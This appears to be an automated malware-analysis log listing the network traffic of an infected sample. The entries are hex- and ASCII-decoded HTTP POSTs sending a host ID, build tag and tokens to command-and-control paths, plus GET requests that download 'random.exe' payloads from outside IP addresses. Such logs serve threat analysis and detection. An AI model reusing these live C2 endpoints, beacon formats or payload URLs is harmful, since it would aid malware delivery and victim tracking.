Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFIIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKFHIIEHIEGDHJJJKFII--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 31 33 35 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1013504001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013505001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013506001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 41 41 4b 46 42 41 45 47 44 47 43 42 47 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 41 43 33 34 33 33 34 31 45 30 31 36 37 31 32 32 37 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 41 41 4b 46 42 41 45 47 44 47 43 42 47 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 41 41 4b 46 42 41 45 47 44 47 43 42 47 43 47 48 2d 2d 0d 0a Data Ascii: ------IEGCAAKFBAEGDGCBGCGHContent-Disposition: form-data; name="hwid"49AC343341E01671227304------IEGCAAKFBAEGDGCBGCGHContent-Disposition: form-data; name="build"stok------IEGCAAKFBAEGDGCBGCGH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013507001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013508001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 41 43 33 34 33 33 34 31 45 30 31 36 37 31 32 32 37 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"49AC343341E01671227304------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"stok------EGDGIIJJECFIDHJJKKFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 41 43 33 34 33 33 34 31 45 30 31 36 37 31 32 32 37 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="hwid"49AC343341E01671227304------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build"stok------HIEBAKEHDHCAKEBFBKEG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
